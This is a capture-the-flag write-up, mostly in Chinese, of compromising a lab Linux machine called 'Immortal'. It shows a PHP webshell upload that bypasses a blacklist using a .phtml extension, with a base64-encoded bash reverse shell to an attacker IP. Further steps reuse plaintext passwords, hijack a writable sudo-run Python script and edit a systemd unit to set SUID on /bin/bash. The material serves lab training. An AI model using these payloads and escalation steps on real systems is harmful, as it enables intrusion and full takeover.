Box Info #
| OS | Linux |
|---|---|
| Difficulty | Medium |
Nmap #
[root@kali] /home/kali/immportal
❯ nmap 192.168.55.17 -sV -A -p-
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.55.4
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 504 Feb 27 2024 message.txt
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 e8:79:ad:8b:d1:a8:39:1b:ac:ed:52:ef:d0:22:0e:eb (RSA)
| 256 65:df:6d:1d:49:11:bd:f3:2f:fa:10:0c:3b:48:69:39 (ECDSA)
|_ 256 f6:b7:bf:cf:a5:d5:1b:26:4e:13:08:31:07:d5:79:b1 (ED25519)
80/tcp open http Apache httpd 2.4.56 ((Debian))
|_http-title: Password
|_http-server-header: Apache/2.4.56 (Debian)
Own www-data #
发现密码是:santiago
进入后得到一个新的php
Message to all.
I'm glad you made it, I knew you would guess the password, it's the one we always used, although Boyras recommended us to stop using it because "it was in rockyou".
By the way guys, you can still upload messages to the server from this new path -> upload_an_incredible_message.php
Saying goodbye very happy, David
进入后可以上传文件到**/chat**目录
并且发现phtml可以绕过黑名单
Content-Disposition: form-data; name="file"; filename="321.phtml"
Content-Type: text/plain
GIF89a
<?php system("printf KGJhc2ggPiYgL2Rldi90Y3AvMTkyLjE2OC41NS40LzQ0NDQgMD4mMSkgJg==|base64 -d|bash");?>
这里可以直接读取到user.txt
Own drake #
发现了一个密码文件
www-data@Immortal:/home/drake/...$ ls -al
total 12
drwxr-xr-x 2 drake drake 4096 Feb 27 2024 .
drwxr-xr-x 4 drake drake 4096 Feb 29 2024 ..
-rw-r--r-- 1 drake drake 134 Feb 27 2024 pass.txt
www-data@Immortal:/home/drake/...$ cat pass.txt
netflix : drake123
amazon : 123drake
shelldred : shell123dred (f4ns0nly)
system : kevcjnsgii
bank : myfavouritebank
nintendo : 123456
其中system的密码就是drake的密码
Own eric #
drake@Immortal:~/...$ sudo -l
Matching Defaults entries for drake on Immortal:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User drake may run the following commands on Immortal:
(eric) NOPASSWD: /usr/bin/python3 /opt/immortal.py
查看具体内容
drake@Immortal:~/...$ ls -al /opt/
total 16
drwxr-xr-x 2 root root 4096 Feb 28 2024 .
drwxr-xr-x 18 root root 4096 Feb 27 2024 ..
-rw-rw-rw- 1 root root 147 Feb 28 2024 immortal.py
-rw-r--r-- 1 root root 36 Feb 28 2024 immortal.txt
drake@Immortal:~/...$ cat /opt/immortal.py
a = input(str("Do you want to be immortal: "))
if a.lower() == "yes" or a.lower() == "no":
print("Bad answer")
else:
print("Are you sure?")
发现可以修改文件内容
drake@Immortal:/opt$ cat immortal.py
import os
os.system("bash -p")
Root #
eric@Immortal:~$ sudo -l
Matching Defaults entries for eric on Immortal:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User eric may run the following commands on Immortal:
(root) NOPASSWD: sudoedit /etc/systemd/system/immortal.service
(root) NOPASSWD: /usr/bin/systemctl start immortal.service
(root) NOPASSWD: /usr/bin/systemctl stop immortal.service
(root) NOPASSWD: /usr/bin/systemctl enable immortal.service
(root) NOPASSWD: /usr/bin/systemctl disable immortal.service
(root) NOPASSWD: /usr/bin/systemctl daemon-reload
可以先用sudoedit修改内容为
[Unit]
Description=Immortal Service
After=network.target
[Service]
Type=oneshot
ExecStart=chmod u+s /bin/bash
[Install]
WantedBy=multi-user.target
Summary #
比较简单,不多说了
Reply by Email